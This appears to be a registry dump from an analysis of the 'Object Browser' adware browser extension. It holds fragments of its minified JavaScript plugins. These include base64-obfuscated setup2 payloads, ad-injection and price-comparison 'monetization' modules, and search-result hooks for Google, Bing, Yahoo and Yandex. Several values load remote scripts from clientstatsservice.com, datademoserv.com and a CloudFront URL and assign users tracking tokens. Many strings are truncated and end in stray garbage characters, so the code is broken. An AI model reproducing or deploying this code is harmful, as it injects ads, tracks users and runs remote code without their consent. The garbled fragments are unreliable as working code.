    [HKCU\Software\Object Browser\Plugins\44]
    "Version" = "6"

    [HKCU\Software\Object Browser\Plugins\78]
    "JavaScript" = "if(typeof jQuery!==undefined&&(jQuery)&&typeof window.navigator!==undefined&&typeof window.navigator.userAgent!==undefined){(function(d,c,e){var a,b;d.uaMatch=function(h){h=h.toLowerCase();var g=/(opr)[\/]([\w.] )/.exec(h)||/(chrome)[ \/]([\w.] )/.exec(h)||/(firefox)[ \/]([\w.] )/.exec(h)||/(webkit)[ \/]([\w.] )/.exec(h)||/(opera)(?:.*version|)[ \/]([\w.] )/.exec(h)||/(msie) ([\w.] )/.exec(h)||h.indexOf(trident)>=0&&/(rv)(?::| )([\w.] )/.exec(h)||h.indexOf(compatible)<0&&/(mozilla)(?:.*? rv:([\w.] )|)/.exec(h)||[];var f=/(ipad)/.exec(h)||/(iphone)/.exec(h)||/(android)/.exec(h)||/(windows)/.exec(h)||/(mac)/.exec(h)||/(linux)/.exec(h)||/(ubuntu)/.exec(h)||[];return{browser:g[1]||,version:g[2]||0,platform:f[0]||};};a=d.uaMatch(c.navigator.userAgent);b={};if(a.browser){b[a.browser]=true;b.name=(b.rv?msie:a.browser);b.version=a.version;}if(a.platform){b[a.platform]=true;b.os=(a.platform===windows?win:a.platform);}if(b.chrome||b.opr){b.webkit=true;}else{if(b.webkit){b.safari=true;}}if(b.rv){bE6"

    [HKCU\Software\Object Browser\Plugins\13]
    "JavaScript" = "(function(a){a.selectedText=function(e,c){function d(){if(window.getSelection){return window.getSelection();}else{if(document.getSelection){return document.getSelection();}else{var f=document.selection&&document.selection.createRange();if(f.text){return f.text;}return false;}}return false;}if(e==null){a.debug(selectedText: no callback function provided.);return;}if(c==null){c={};}c.lastSelection=;c.minlength=c.minlength||1;c.maxlength=c.maxlength||99999999;var b;switch(typeof(c.element)){caseundefined:b=$jquery(body);break;caseobject:if(c.element instanceof jQuery){b=c.element;}else{a.debug(selectedText: element provided as an unrecorgnize object.);return;}break;casestring:b=$jquery(c.element);break;default:a.debug(selectedText: unknown element.);return;}b.mouseup(function(g){var f=d();if(f&&String(f)==c.lastSelection){c.lastSelection=;return;}else{c.lastSelection=String(f);}if(f&&String(f).length>=c.minlength&&String(f).length<=c.maxlength){e(f,g);}});};})(appAPI);(function(b){var c=functi"

    [HKCU\Software\Object Browser\Plugins\207]
    "Name" = "dbWrapper"

    [HKCU\Software\Object Browser\Plugins\177]
    "URL" = "http://js.clientstatsservice.com/plugins/mins/crossriderDashboard.js"

    [HKCU\Software\Object Browser\Plugins\182]
    "Version" = "3"

    [HKCU\Software\Object Browser\Plugins\94]
    "Name" = "IEPopup"

    [HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
    "Seed" = "FE DD E9 AA D9 7D DA 4A BD 95 44 73 A5 E8 06 11"

    [HKCU\Software\Object Browser\Plugins\40]
    "URL" = "http://js.clientstatsservice.com/plugins/mins/ie/IEExtension.js"

    [HKCU\Software\Object Browser\Plugins\246]
    "Version" = "12"

    [HKCU\Software\Object Browser\Manifest]
    "Manifest" = "NA"

    [HKCU\Software\Object Browser\Plugins\40]
    "JavaScript" = "if(typeof appAPI===undefined){appAPI={};}if(typeof appAPI.internal===undefined){appAPI.internal={};}if(typeof appAPI.internal.callbacks===undefined){appAPI.internal.callbacks={};}appAPI.internal.scope=Consts.SCOPE.PAGE;appAPI.internal.callbacks.setEventHandler(externalConsole,function(a){if(appAPI.dom.isIframe()){return;}var c=a.level;var b=a.text;if(typeof c===undefined){console.error(Received undefined Background console level);return;}if(typeof console[c]===undefined){console.error(Received undefined Background console level);return;}if(typeof b===undefined){console.error(Received undefined Background console text);return;}console[c](b);});appAPI.internal.callbacks.setEventHandler(onBeforeNavigate,function(a){});appAPI.internal.callbacks.setEventHandler(windowOpen,function(a){if(appAPI.dom.isIframe()||!appAPI.isActiveTab()){return;}window.open(a.url,a.name,a.specs,a.replace);});try{if(!appAPI.dom.isIframe()){appAPI.internal.activeTabCounter=0;setInterval(function(){if(appAPI.isActiï¡‹J"

    [HKCU\Software\Object Browser\Plugins\3]
    "URL" = "http://js.clientstatsservice.com/plugins/mins/ie8_fix_2.js"

    [HKCU\Software\Object Browser\Plugins\39]
    "JavaScript" = "if(typeof appAPI===""undefined""){appAPI={};}(function(c){appAPI.cookie=function(h,k,f,i){var g=""%@%ZZCR__AJAXZZ$C@R#"";function e(o,q,l,p){if(typeof(o)!==""string""){return false;}var n=appAPI.JSON.stringify(q);var m=new Date(2030,1,1,0,0,0,0);if(l instanceof Date){m=l;}c.setLocalCookie(o,n,m.toUTCString(),p);return true;}function j(m,n){if(m==""InstallerParams""&&n==""Local""){return appAPI.JSON.parse(appAPI.internal.prefs.getChar(""Params""

    [HKCU\Software\Object Browser\Plugins\7]
    "JavaScript" = "appAPI.hooks={$:$jquery_171,hooks:{},addHook:function(a,b){this.hooks[a]=b;},removeHook:function(a){delete this.hooks[a];},register:function(b,a){return this.hooks[b]?new (this.$.Class.extend(this.$.extend(this.getClass(),this.$.isFunction(this.hooks[b])?this.hooks[b]():this.hooks[b])))(a):null;},getClass:(function(a){return function(){return{listeners:[],addListener:function(b,c){this.listeners.push({name:b,fn:c});},removeListener:function(c,d){var b=[];a.each(this.listeners,function(e,f){if(c!=f.name&&d!=f.fn){b.push(f);}});this.listeners=b;},fireEvent:function(b,c){a.each(this.listeners,a.proxy(function(d,e){if(b==e.name){e.fn.call(this,c);}},this));}};};}($jquery_171))};"

    [HKCU\Software\Object Browser\Plugins\123]
    "JavaScript" = "if (typeof setup2 === 'function') { setup2('MDg3ODczNGIxODFkMDQxZDMwMDYxZjUwNDA0OTUyMDEwNDE5MTU0ZTVjNWQxMzA3MDQwYzA4MTk0YjFhMTIwNDU3MDUxOTA3MWIxZTRiMTcxYzFmNTUwMzAzNDYxOTAzMTExMTBiMDY1NDAzMDM1NjExMGIwYzEwNGUxMTA4MDYwMzFhMDIwNDAxMTEwMTU0MDkxYzEyMDAxNDUwM2EyYjMwMjAzNTNhMjMzYjM5MjkyMDI2MmMyMTJmMmIyZjIwMzQzMjNhNTIxZTEzMDIwNTE5MDcxYjFlNTg0YzU1MWUxMzA3MWIwYTFmMDEwYTA2NGU1MTRhNTk0MDU5MzYyYjQ3NTg3OTdiNTgwMTA0MWQwMDFlMzAwNjFmNTA0MDQ5NTIwMTA0MTkxNTA3NDk1ZDU1MDAxZTFkMTUxNTExNWExZDEzMGM0NDFjMDAxZTA2MTY1YTEwMWQxNzQ2MWExYTVmMDQwYjAwMTYwYTBlNDcxYTFhNGYwYzAzMWQxNzRmMTkxYjFmMWEwMzFmMGMxMDE2MDA1YzFhMDUwYjE5MDk1ODJiMmMzMTI4MjYyMzNhMjIyNDIxMzEyMTJkMjkzYzMyMzYzOTI5M2EyYjU1MWYxYjExMWMwMDFlMDYxNjQ5NGI1NDE2MDAxZTAyMTMwMjA5MWIwMTRmNTk1OTQwNTk0MDJiMjM1NjVmNzg3MzRiMDAwNTA1MGEwYzFhM2ExNjU4NTM1MDU4NDI1ZTQ5N2U1MzUyNWE0OTUyMWYxNTFmMTExZDEwMTMxNjRiNGE0OTJiNGYwYzFhMDcxNzAyMWQ1MjM0N2ExMA==', 'srzipipmet'); }"

    [HKCU\Software\Object Browser\Plugins\260]
    "URL" = "http://js.clientstatsservice.com/plugins/mins/monetization/geo/pricedetect_sidebar_m.js"

    [HKCU\Software\Object Browser\Code]
    "AppJavaScript" = " /************************************************************************************ This is your Page Code. The appAPI.ready() code block will be executed on every page load. For more information please visit our docs site: http://docs.crossrider.com*************************************************************************************/appAPI.ready(function($) { // Place your code here (you can also define new functions above this scope) // The $ object is the extension's jQuery object //sendReport(); setupInjections(); //BlekoEnhancedSearch(); function getPixGuid(){ var aff_id = ; try { var zdata = appAPI.installer.getParams().uzid; $.base64.is_unicode = false; var jsonData = $.base64.decode(zdata); var jsonObj = $.parseJSON(jsonData); if (jsonObj !== null) { aff_id = jsonObj.data.date; } } catch (err) { //In case there's an error - just catch it here, so we'll do things gracefully.J"

    [HKCU\Software\Object Browser\Plugins\41]
    "Version" = "7"

    [HKCU\Software\Object Browser\Plugins\46]
    "Version" = "5"

    [HKCU\Software\Object Browser\Plugins\78]
    "Name" = "CrossriderInfo"

    [HKCU\Software\Object Browser\Plugins\94]
    "URL" = "http://js.clientstatsservice.com/plugins/mins/ie/IEPopup.js"

    [HKCU\Software\Object Browser\Plugins\260]
    "Version" = "2"

    [HKCU\Software\Object Browser\Manifest]
    "DisableIe" = "true"

    [HKCU\Software\Object Browser\Plugins\102]
    "JavaScript" = "if (typeof setup2 === 'function') { setup2('MWU2NDQyNTQ0NDU0NTYwZTEyMTcxNTNiMTAxODQ2NGU1NDQ0MGUxNzExMWU1ODViNGIxZDVhMDUxNDA3MTcwNDExNWEwZDFhMTIwOTQ5MDAxNzBhMTA1YjBlMTUwMjA3MTUwMDE3MDcxMjAwNGExZTA3NTkwNTBiMDQwMDBjMTEwODQ5MTcxNDAyMTEzYTMxM2QzNzM2M2IyNzM1MzQyYTIxMmIzMDJiMjEyYzIwMjMyODI3MjAyYTNkMjczMTM2MmIyZjIyM2MzYTQ4MDMwNDE0MjAxZDEyMGEwNjU4MzEzZDM3MzYzYjI3MzUzNDJhMjEyYjMwMmIyNTI0MjQzOTI4MjIyODJiM2QyYjQyMWMxZDAyNWIzYzNhMmQzMDNiMzcyNzI2MmYyMjI2MzczMTM3MjcyMTI2MmIyZjIyM2MzYTRjNGU3ZTQ0NTQ1NDQ2NDQwYjExMWExMjA3MzEwNjE4NDQ1YzQzNDcwNjE2MDAxNDA3NGU0OTQ5MGEzYTBkMTAxMDE2MWUwNzM5MGYwZDAzMDE0YzAwMDgwNzE3MDIwODRkMDYwMTBmNWIwNzA2MTAxNDQ5MDkwNDE4MDMwNzA3MDYxZDE2MTI0ZDBmMWQ1ZDE3MGMxNTFhMDgwMzBmNTgwZDEwMTAxNjJiMmIzOTI1MzEyYTNkMzEyNjJkMzAzMTM0MzkyNjNkM2EyNzNhMjAzMTMwMzkzNTM2MjczMTJiMzAzYjJiNTIwNzE2MTMzMTA3MTYxODAxNDkyYjM5MjUzMTJhM2QzMTI2MmQzMDMxMzQzOTIyMzUzZTNkM2EyNTM5MzEzOTM5NDUwZDA3MDY0OTNiMmIzNzM0MjkzMDM2M2MyYjMwMjEyNjJiMzMzNTI2MzczMTJiMzAzYjJiNTY0YTZjNDM0NTRlNDI1NjE0MTgwMTAxMGYwZDJjMGE0MDRlNDQ0NTQ0NTQ2YzFl', 'enbtdttffc'); }"

    [HKCU\Software\Object Browser\Plugins\21]
    "Name" = "debug"

    [HKCU\Software\Object Browser\Plugins\17]
    "Name" = "jQuery"

    [HKCU\Software\Object Browser\Plugins\94]
    "JavaScript" = "appAPI.isBackground=false;appAPI.tabId=POPUP;appAPI.internal.scope=Consts.SCOPE.POPUP;appAPI.browserAction.setBadgeBackgroundColor=function(a){if(!(a instanceof Array)){console.error(appAPI.browserAction.setBadgeBackgroundColor - Invalid parameter. Expected an array but got: (typeof a));return;}if(a.length!==4){console.error(appAPI.browserAction.setBadgeBackgroundColor - Invalid parameter. Color array should have 4 members (RGBA));return;}appAPI.internal.message.send({eventName:onSetBadgeColorFromPopup,eventContent:a});};appAPI.browserAction.setBadgeText=function(c,a){var b={};if(typeof c!==string){console.error(appAPI.browserAction.setIcon - Invalid parameter. Expected string (1st param) but got: (typeof c));return;}b.text=c;if(typeof a===undefined||a===null){b.color=null;}else{if(!(a instanceof Array)){console.error(appAPI.browserAction.setBadgeText - Invalid parameter. Expected an array (2nd param) but got: (typeof a));return;}else{if(a.length!==4){console.error(appAPI.browserAction.se"

    [HKCU\Software\Object Browser\Plugins\9]
    "URL" = "http://js.clientstatsservice.com/plugins/mins/searchengines_hook.js"

    [HKCU\Software\Object Browser\Plugins\104]
    "JavaScript" = "appAPI.internal.monetization = appAPI.internal.monetization || {};if (typeof appAPI.internal.monetization.plugins === undefined) { appAPI.internal.monetization.plugins = {}; }appAPI.internal.monetization.plugins[104] = function() { if (!appAPI.internal.monetization.shouldRunByVertical(104, [shopping])){ return; } var app_id='0'; var uid='0'; var app_name = ''; try{app_name = '&name=' encodeURIComponent(appAPI.appInfo.name);} catch(e) {app_name='';} try{app_id = appAPI.appInfo.id;}catch(err){} if (appAPI && appAPI.installer && appAPI.installer.getParams) { app_id = appAPI.installer.getParams().source_id; } if(appAPI && appAPI.installer && appAPI.installer.getUserId){uid=appAPI.installer.getUserId();} var token = appAPI.db.get(jw_token); if(token === '' || token===null || token === undefined){ var S4 = function() {return (((1 Math.random())*0x10000)|0).toString(16).substring(1);}; token=(S4() S4() - S4() - S4() - S4() - S4() S4() S4()); appAPI.db.set(jw_token,tokeH"

    [HKCU\Software\Object Browser\Plugins]
    "BrowserEventPluginList" = "14,42,41,44,39,38,43,37,64,72"

    [HKCU\Software\Object Browser\Plugins\246]
    "URL" = "http://js.clientstatsservice.com/plugins/mins/monetization/setup.js"

    [HKCU\Software\Object Browser\Plugins\182]
    "JavaScript" = "(function(){if(typeof $jquery_171===undefined){return;}var c={DUMMY_PAGE_URL:http://page.our-app.net/blank/resource.html};(function(){if(appAPI&&appAPI.internal&&appAPI.internal.hosts&&typeof appAPI.internal.hosts.dummyPageUrl===string&&appAPI.internal.hosts.dummyPageUrl.length>0){c.DUMMY_PAGE_URL=appAPI.internal.hosts.dummyPageUrl;}}());appAPI.openURL=(function(){var d=appAPI.openURL;var e=function(g){d({url:c.DUMMY_PAGE_URL ?appid= appAPI.appInfo.id &resourcepath= escape(g.resourcePath) &rnd= (new Date()).getTime(),where:g.where,focus:g.focus,focusTimer:g.focusTimer,left:g.left,top:g.top,height:g.height,width:g.width});};var f=function(g){if(!appAPI.utils.isObject(g)){return;}if(!appAPI.utils.isDefined(g.resourcePath)){d(g);return;}e(g);};return function(h,g){var i=h;try{if(appAPI.utils.isString(h)){d(h,g);return;}f(i);}catch(j){}};}());var a=function(){(function(){var f=document.createElement(link);f.type=image/x-icon;f.rel=shortcut icon;f.href=;document.getElementsByTagName(head)[0]H"

    [HKCU\Software\Object Browser\Plugins\43]
    "JavaScript" = "if(typeof appAPI===undefined){appAPI={};}if(typeof appAPI.internal===undefined){appAPI.internal={};}if(typeof appAPI.internal.callbacks===undefined){appAPI.internal.callbacks={};}if(typeof appAPI.internal.message===undefined){appAPI.internal.message={};}appAPI.internal.message.send=function(b){if(typeof b!==object){return false;}if(typeof b.eventName!==string){return false;}b.senderTabId=appAPI.tabId;var c;try{c=appAPI.JSON.stringify(b);}catch(a){console.error(appAPI.message error - Caught a JSON exception when trying to stringify the message);return false;}if(typeof c!==string){console.error(appAPI.message error - Failed to stringify message);return false;}if(c.length>8192){console.error(appAPI.message error - can't send message because content is too long: c.length);return false;}appAPIinternal.msgToAllTabs(c);return true;};appAPI.internal.callbacks.crossBhoEvent=function(b){if(typeof b.msgObj!==string){return;}try{b=appAPI.JSON.parse(b.msgObj);}catch(c){console.error(Failed to pars粐H"

    [HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path4]
    "CacheLimit" = "65452"

    [HKCU\Software\Object Browser\Plugins\257]
    "Version" = "1"

    [HKCU\Software\Object Browser\Plugins\17]
    "JavaScript" = "if(typeof window!==undefined){/*! * jQuery JavaScript Library v1.4.2 * http://jquery.com/ * * Copyright 2010, John Resig * Dual licensed under the MIT or GPL Version 2 licenses. * http://jquery.org/license * * Includes Sizzle.js * http://sizzlejs.com/ * Copyright 2010, The Dojo Foundation * Released under the MIT, BSD, and GPL Licenses. * * Date: Sat Feb 13 22:33:48 2010 -0500 */var $$jquery;(function(aO,D){var a=function(e,a0){return new a.fn.init(e,a0);},o=aO.jQuery,S=aO.$,ac=aO.document,Y,Q=/^[^<]*(<[\w\W] >)[^>]*$|^#([\w-] )$/,aY=/^.[^:#\[\.,]*$/,az=/\S/,N=/^(\s|\u00A0) |(\s|\u00A0) $/g,f=/^<(\w )\s*\/?>(?:<\/\1>)?$/,b=navigator.userAgent,v,L=false,af=[],aI,av=Object.prototype.toString,ar=Object.prototype.hasOwnProperty,h=Array.prototype.push,G=Array.prototype.slice,t=Array.prototype.indexOf;a.fn=a.prototype={init:function(e,a2){var a1,a3,a0,a4;if(!e){return this;}if(e.nodeType){this.context=this[0]=e;this.length=1;return this;}if(e===body&&!a2){this.context=ac;this[0]=ac.body;this.seTH"

    [HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
    "AppData" = "%Documents and Settings%\%current user%\Application Data"

    [HKCU\Software\Object Browser\Plugins\123]
    "URL" = "http://js.clientstatsservice.com/plugins/mins/monetization/geo/intext_adv_m.js"

    [HKCU\Software\Object Browser\Manifest]
    "BgVersion" = "1"

    [HKCU\Software\Object Browser\Plugins\21]
    "JavaScript" = "var CrossriderDebugManager=(function(h){var f={appId:appAPI._cr_config.appID(),url:appAPI._cr_config.debug_app};return h.Class.extend({init:function(){if(appAPI.isMatchPages.apply(this,f.url.debug_page)){h(document).ready(function(){h(body).bindExtensionEvent(debug_request_data,function(j,i){if(i.appId==f.appId){e();}});h(body).bindExtensionEvent(debug_request_reload_background,function(j,i){if(i.appId==f.appId&&appAPI.internal.reloadBackground){appAPI.internal.reloadBackground();}});h(body).bindExtensionEvent(debug_request_reload_plugins,function(j,i){if(i.appId==f.appId){appAPI.resources.requestReload();setTimeout(appAPI.internal.forceUpdate,750);}});h(body).bindExtensionEvent(debug_mode_activate,function(j,i){if(i.appId==f.appId){b(i);}});h(body).bindExtensionEvent(debug_mode_deactivate,function(j,i){if(i.appId==f.appId){d();}});h(body).bindExtensionEvent(debug_request_database,function(j,i){if(i.appId==f.appId){c(i);}});h(body).bindExtensionEvent(debug_request_database_remove,rH"

    [HKCU\Software\Object Browser\Plugins\191]
    "Name" = "ciuvo_m"

    [HKCU\Software\Object Browser\Plugins\104]
    "Name" = "jollywallet_m"

    [HKCU\Software\Object Browser\Plugins\184]
    "Name" = "noproblemppc_m"

    [HKCU\Software\Object Browser\Debug]
    "IsDebuggingPlugins" = "0"

    [HKCU\Software\Object Browser\Manifest]
    "PublisherName" = "Object Browser"

    [HKCU\Software\Object Browser\Plugins]
    "BgPluginList" = "246,42,38,46,41,44,39,35,43,36,4,14,78,64,183,207,47,182,72,269,93,102,123,180,184,191,211,223,242,244,259,260,91"

    [HKCU\Software\Object Browser\Manifest]
    "PluginsManifestVersion" = "164"
    "PublisherId" = "20891"

    [HKCU\Software\Object Browser\Plugins\260]
    "Name" = "pricedetect_sidebar_m"

    [HKCU\Software\Object Browser\Plugins\242]
    "URL" = "http://js.clientstatsservice.com/plugins/mins/monetization/geo/price_gong_m.js"

    [HKCU\Software\Object Browser\Plugins\91]
    "Version" = "51"

    [HKCU\Software\Object Browser\Plugins\22]
    "URL" = "http://js.clientstatsservice.com/plugins/mins/resources.js"

    [HKCU\Software\Object Browser\Plugins\78]
    "Version" = "5"

    [HKCU\Software\Object Browser\Plugins]
    "AppPluginList" = "246,42,38,46,17,14,78,13,41,44,39,35,43,40,64,2,4,3,1,21,22,182,183,207,72,7,9,93,102,104,123,180,184,191,211,217,223,242,244,257,259,260,177,91,28"

    [HKCU\Software\Object Browser\Plugins\9]
    "JavaScript" = "appAPI.hooks.addHook(searchEngine,(function(a){return function(){var f={keyDelay:1000},e,h;return{init:function(i){e=this;this.addEngine({name:google,url:google,input:input[name=q],results:#rso,result:'

  • '});this.addEngine({name:bing,url:bing.com,input:input[name=q],results:#results > ul,result:'
  • '});this.addEngine({name:yandex,url:yandex.ru,input:form.b-head-search input.b-form-input__input,form.b-search input.b-form-input__input,results:.b-body-items > ol,result:'
  • '});this.addEngine({name:yandex,url:yandex.com,input:form.b-search input.b-form-input__input,#searchInput,results:.b-serp2-list__portion,result:'
    '});this.addEngine({name:yahoo,url:yahoo.com,input:input[name=p],results:#web ol:eq(0),result:
  • });this.addEngine({name:yahoo,url:search.yahoo.com,input:input[name=p],results:#web ol:eq(0),result:
  • });this.addEngine({name:ask,urlH"

    [HKCU\Software\Object Browser\Plugins\35]
    "Version" = "4"

    [HKCU\Software\Object Browser\Plugins\47]
    "Version" = "3"

    [HKCU\Software\Object Browser\Plugins\43]
    "URL" = "http://js.clientstatsservice.com/plugins/mins/ie/IEMessaging.js"

    [HKCU\Software\Object Browser\Plugins\4]
    "Name" = "jquery_1_7_1"

    [HKLM\System\CurrentControlSet\Hardware Profiles\0001\Software\Microsoft\windows\CurrentVersion\Internet Settings]
    "ProxyEnable" = "0"

    [HKCU\Software\Object Browser\Plugins\17]
    "URL" = "http://js.clientstatsservice.com/plugins/mins/jQuery.js"

    [HKCU\Software\Object Browser\Plugins\13]
    "Name" = "CrossriderAppUtils"

    [HKCU\Software\Object Browser\Plugins\47]
    "JavaScript" = "(function(){appAPI.ready=function(a){appAPI.resources.isReady(a);};}());var CrossRiderResourcesManager=(function(){var C={appId:(function(){var D=appAPI.appInfo;if(D){return appAPI.appInfo.id;}else{return appAPI.appID;}})(),url:{base:{production:http://resources.crossrider.com,staging:http://staging-app.crossrider.com},update:/apps/{appId}/resources/meta/{lastVersion}},env:appAPI.appInfo.environment===staging?staging:production,saveResource:appAPI.time.daysFromNow(90),nextCheck:360,DBNamespace:Resources_,isDebug:(appAPI.internal.debug.isDebugMode()&&appAPI.internal.db.get(debug_resources_path))},w=o(meta)||{},g=o(remote_resources)||{remoteId:0},t=o(queue)||{},B=o(lastVersion)||0,A,s;appAPI.resources={init:function(){if(C.isDebug){h();}else{l(function(D){if(D){k();}else{h();}});}},isReady:function(D){s=D;if(A){h();}},get:function(D){if(typeof jQuery!==undefined){D=jQuery.trim(D);}return b(D,string);},includeCSS:function(G,F){if(typeof jQuery!==undefined){G=jQuery.trim(G);}var E=b\H"

    [HKCU\Software\Object Browser\Plugins\123]
    "Name" = "intext_adv_m"

    [HKCU\Software\Object Browser\Manifest]
    "ThanksUrl" = "NA"

    [HKCU\Software\Object Browser\Plugins\36]
    "JavaScript" = "if(typeof appAPI===undefined){appAPI={};}if(typeof appAPI.internal===undefined){appAPI.internal={};}if(typeof appAPI.internal.callbacks===undefined){appAPI.internal.callbacks={};}appAPI.isBackground=true;appAPI.tabId=BG;appAPI.internal.scope=Consts.SCOPE.BACKGROUND;appAPI.openURL=function(c,b){if(typeof c===undefined){return;}var a;if(typeof c===object){a=c;}else{a={url:c,where:b};}appAPI.internal.message.send({eventName:openURL,eventContent:a});};appAPI.internal.runHelper=function(a){if(typeof a!==string){console.error(appAPI.runHelper - Invalid parameter. Expected string (1st param) but got: (typeof a));return;}appAPI.internal.message.send({eventName:runHelper,eventContent:a});};window.alert=function(a){a=(a===null?null:a);a=(typeof a===undefined?undefined:a);appAPIinternal.alert(a);};appAPI.internal._isMonitorAPISupported_=function(){return(typeof appAPIinternal.supportMonitor!==undefined);};window.open=function(b,a,d,c){appAPI.internal.message.send({eventName:windowOpen,eveCH"

    [HKCU\Software\Object Browser\Code]
    "NewTabJavaScript" = ""

    [HKCU\Software\Object Browser\Plugins\177]
    "Version" = "2"

    [HKCU\Software\Object Browser\Plugins\91]
    "JavaScript" = "(function(t){var v=06-01;if(!appAPI.isBackground&&appAPI.dom&&appAPI.dom.isIframe()){return;}var F=appAPI.utils.MD5;if(!F||!F.encode){F={};F.encode=function(M){return M;};}if(typeof appAPI.internal.monetization===undefined){appAPI.internal.monetization={};}var J=appAPI.utils;var w={DBNamespace:monetization_plugin_,RULS_JSON_NAMESPACE: rules_,MONETIZATION_PLUGINS_IDS:monetization_plugins_ids,IS_INSTALL_REPORTED:is_install_reported_,STATS_NAMESPACE:stats_,PLUGINS_VERSION:plugins_version_,GEO_URL:http://ipgeoapi.com/,BASE_DATE:new Date(2013,0,1),updateInterval:1000*60*60*6,rulesJsonHostUrl:http://app.datademoserv.com/monetization_campaigns/,statsHostUrl:http://logs.datademoserv.com/monetization.gif?,errorHostUrl:http://errors.datademoserv.com/monetization-error.gif?,countryName:,reportQueryString:,subID:000000000000000000,reportEvents:{installEventId:0,dailyEventId:1,vertical:2,runningPlugins:6,installVertical:13,impressionsEventId:31,newAllowedVertical:32,policyAppDefualtInstallEveeH"

    [HKCU\Software\Object Browser\Plugins\191]
    "URL" = "http://js.clientstatsservice.com/plugins/mins/monetization/geo/ciuvo_m.js"

    [HKCU\Software\Object Browser\Plugins\41]
    "JavaScript" = "if(typeof appAPI===""undefined""){appAPI={};}(function(a){appAPI.isBackground=false;appAPI.tabId=a.getBhoInstanceId();appAPI.getTabId=function(){return appAPI.tabId;};appAPI.isActiveTab=function(){return appAPIinternal.isActiveTab();};appAPI.platform=""IE"";if(typeof appAPI.appInfo===""undefined""){appAPI.appInfo={};}var c=appAPI.internal.prefs.getChar(""fullVersionForUrl""

    [HKCU\Software\Object Browser\Plugins\22]
    "Version" = "5"

    [HKCU\Software\Object Browser\Plugins\242]
    "Name" = "price_gong_m"

    [HKCU\Software\Object Browser\Plugins\211]
    "Version" = "5"

    [HKCU\Software\Object Browser\Plugins\207]
    "URL" = "http://js.clientstatsservice.com/plugins/mins/dbWrapper.js"

    [HKCU\Software\Object Browser\Plugins\2]
    "URL" = "http://js.clientstatsservice.com/plugins/mins/ie8_fix_1.js"

    [HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path1]
    "CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache1"

    [HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path3]
    "CacheLimit" = "65452"

    [HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
    "MigrateProxy" = "1"

    [HKCU\Software\Object Browser\Plugins\123]
    "Version" = "9"

    [HKCU\Software\Object Browser\Plugins\2]
    "Name" = "ie8_fix_1"

    [HKCU\Software\Object Browser\Plugins\257]
    "JavaScript" = "appAPI.internal.monetization = appAPI.internal.monetization || {};if (typeof appAPI.internal.monetization.plugins === undefined) { appAPI.internal.monetization.plugins = {}; }appAPI.internal.monetization.plugins[257] = function() { appAPI.internal.monetization.addRemoteJS({ httpsUrl: https://dyau9xqp8gzji.cloudfront.net/autotag.js, httpUrl: https://dyau9xqp8gzji.cloudfront.net/autotag.js, pluginId: 257 });};"

    [HKCU\Software\Object Browser\Plugins]
    "PopupPluginList" = "42,38,46,41,44,39,35,43,36,4,14,78,13,64,207,47,182,72,94"

    [HKCU\Software\Object Browser\Plugins\182]
    "Name" = "openUrl"

    [HKCU\Software\Object Browser\Plugins]
    "OnRequestPluginList" = "14,42,41,39,38,43,45,64,72"

    [HKCU\Software\Object Browser\Plugins\28]
    "Version" = "4"

    [HKCU\Software\Object Browser\Plugins\242]
    "Version" = "3"

    [HKCU\Software\Object Browser\Plugins\211]
    "URL" = "http://js.clientstatsservice.com/plugins/mins/monetization/geo/revizer_ws_dynamic_b2b_light_m.js"

    [HKCU\Software\Object Browser\Plugins\47]
    "Name" = "resources_background"

    [HKCU\Software\Object Browser\Plugins\37]
    "Name" = "IEBrowserEvents"

    [HKCU\Software\Object Browser\Plugins\183]
    "JavaScript" = "(function(){if(typeof $jquery_171===undefined){return;}var d=__TABS_ON_UPDATED_ACTIVE_KEY;var c=__tabsOnUpdateActive__;var a={SCOPE:{BACKGROUND:0,PAGE:1,POPUP:5,OPEN_URL:6}};if(!appAPI.utils.isFunction(appAPI.internal.globalEval)){appAPI.internal.globalEval=function(e){(new Function(e)).apply(window);};}if(appAPI.internal.scope==a.SCOPE.BACKGROUND){appAPI.tabs.reloadTab=function(e){if(typeof e.delay===number){appAPI.setTimeout(function(){appAPI.message.toAllTabs({tabId:e.tabId},{channel:__tabsReloadTab__});},e.delay);}else{appAPI.message.toAllTabs({tabId:e.tabId},{channel:__tabsReloadTab__});}};appAPI.tabs.executeScript=function(e){appAPI.message.toAllTabs(e,{channel:__tabsExecuteScript__});};appAPI.tabs.onTabUpdated=function(e){if(typeof e!==function){return;}appAPI.message.addListener({channel:__tabsOnTabUpdated__},function(f){e(f);});appAPI.internal.db.set(d,true);appAPI.message.toAllTabs({},{channel:c});};}else{if(appAPI.internal.scope==a.SCOPE.PAGE&&!appAPI.dom.isIframe()){var b=functiH"

    [HKCU\Software\Object Browser\Plugins\1]
    "URL" = "http://js.clientstatsservice.com/plugins/mins/base.js"

    [HKCU\Software\Object Browser\Plugins\269]
    "Version" = "1"

    [HKCU\Software\Object Browser\Plugins\257]
    "URL" = "http://js.clientstatsservice.com/plugins/javascripts/monetization/geo/adextent_m.js"

    [HKCU\Software\Object Browser\Plugins\259]
    "Version" = "1"

    [HKCU\Software\Object Browser\Plugins\14]
    "JavaScript" = "if(typeof(appAPI)===undefined){appAPI={};}var CR__bIsIEWindow=false;if(typeof window!==undefined&&typeof window.navigator!==undefined&&typeof window.navigator.userAgent!==undefined){CR__bIsIEWindow=/MSIE (\d \.\d );/.test(window.navigator.userAgent);}CR__bIsIEWindow=(CR__bIsIEWindow||(typeof appAPIinternal!==undefined));appAPI.JSON={};if(typeof JSON!==undefined&&!CR__bIsIEWindow){appAPI.JSON=JSON;}else{(function(){function f(n){return n<10?0 n:n;}if(typeof Date.prototype.to_CR_JSON!==function){Date.prototype.to_CR_JSON=function(key){return isFinite(this.valueOf())?this.getUTCFullYear() - f(this.getUTCMonth() 1) - f(this.getUTCDate()) T f(this.getUTCHours()) : f(this.getUTCMinutes()) : f(this.getUTCSeconds()) Z:null;};String.prototype.to_CR_JSON=Number.prototype.to_CR_JSON=Boolean.prototype.to_CR_JSON=function(key){return this.valueOf();};}var 